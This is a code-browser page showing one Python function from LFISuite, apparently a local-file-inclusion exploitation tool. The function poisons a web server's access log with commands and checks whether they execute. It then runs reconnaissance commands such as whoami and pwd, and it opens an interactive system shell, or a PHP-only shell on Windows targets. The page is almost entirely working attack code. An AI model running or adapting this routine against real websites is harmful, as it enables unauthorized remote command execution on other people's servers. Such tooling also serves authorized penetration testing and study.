hub / github.com/D35m0nd142/LFISuite / simpleGETorHEAD

Function simpleGETorHEAD

lfisuite.py:961–1032
(keyword, ologurl, logmain)

Source from the content-addressed store, hash-verified

    exit()

def simpleGETorHEAD(keyword, ologurl, logmain):
    randStr = generateRandom()
    send_access_log_cmd("echo %s" %randStr, logmain, keyword)

    if(access_log_reverse):
        r = requests.get(url,headers=gen_headers, verify=False)
    else:
        r = requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)

    resp = r.text
    print colored("\nTrying to inject the website using simple %s requests." %keyword, "white")

    if(access_control(resp,keyword,randStr)):
        print "[+] The website seems to be vulnerable. Opening a System Shell..\n"
        time.sleep(1)
        cmd = ""

        send_access_log_cmd("whoami", logmain, keyword)
        whoami = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
        send_access_log_cmd("pwd", logmain, keyword)
        pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)

        access_log_while(whoami,logmain,pwd,ologurl,keyword,False)

    # -------------------------------------------------------------------------------------------
    else:
        # check if Windows operating system
        # ----------------------------------------------------- #
        send_access_log_cmd("path",logmain,keyword)
        path = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
        time.sleep(1)

        if(checkIfWindows(path)):
            # trying to get current Windows user by using 'whoami' command
            send_access_log_cmd("whoami", logmain, keyword)
            whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))

            if("?" in whoami):
                # Try to get current_user using PHP function 'get_current_user()'
                send_access_log_cmd("get_current_user();", logmain, keyword+"_PHP")
                whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))

            send_access_log_cmd("cd", logmain, keyword)
            pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
            access_log_while(whoami,logmain,pwd,ologurl,keyword,True)

        # ----------------------------------------------------- #

        # Try to open an only PHP-based shell
        rand_str = generateRandom()

        send_access_log_cmd("echo '%s';" %rand_str,logmain,keyword+"_PHP")
        resp = (requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)).text
        if(access_control(resp,keyword+"_PHP",rand_str)):
            print "[+] The website seems to be vulnerable. Opening a Shell.."
            time.sleep(1)
            onlyPhpPrint()

Callers 1

run_access_log · Function · 0.85

Calls 10

generateRandom · Function · 0.85
send_access_log_cmd · Function · 0.85
access_control · Function · 0.85
cleanOutput · Function · 0.85
access_log_ext · Function · 0.85
access_log_while · Function · 0.85
checkIfWindows · Function · 0.85
isUnknown · Function · 0.85
onlyPhpPrint · Function · 0.85
exit · Function · 0.85

Tested by

no test coverage detected